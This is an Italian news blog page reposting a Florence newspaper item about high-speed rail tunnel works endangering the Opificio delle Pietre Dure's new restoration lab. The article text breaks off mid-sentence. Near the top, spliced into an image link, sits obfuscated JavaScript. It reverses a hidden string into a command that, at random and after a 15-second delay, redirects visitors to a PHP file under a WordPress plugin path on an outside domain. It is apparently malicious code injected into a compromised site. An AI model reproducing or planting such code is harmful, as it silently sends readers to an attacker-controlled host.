La talpa TAV minaccia l’Opificio delle Pietre dure

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/07/raffaello_cardellino.jpg”>raffaello_cardellino
la Madonna del cardellino, di Raffaello

Duccio Tronci dal Nuovo Corriere di Firenze

Mentre i politici discutono dei dettagli del progetto Tav, i cantieri vanno avanti. E dall’Opificio delle Pietre Dure lanciano l’allarme: “II nostro nuovo laboratorio di restauro alla Fortezza sarà messo in pericolo dai lavori del tunnel. Ma nessuno si è fatto vivo”. Così anche il centro d’eccellenza dell’arte fiorentina è a rischio per il passaggio della talpa.
E’ il luogo che ha visto il restauro della Madonna del Cardellino,

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *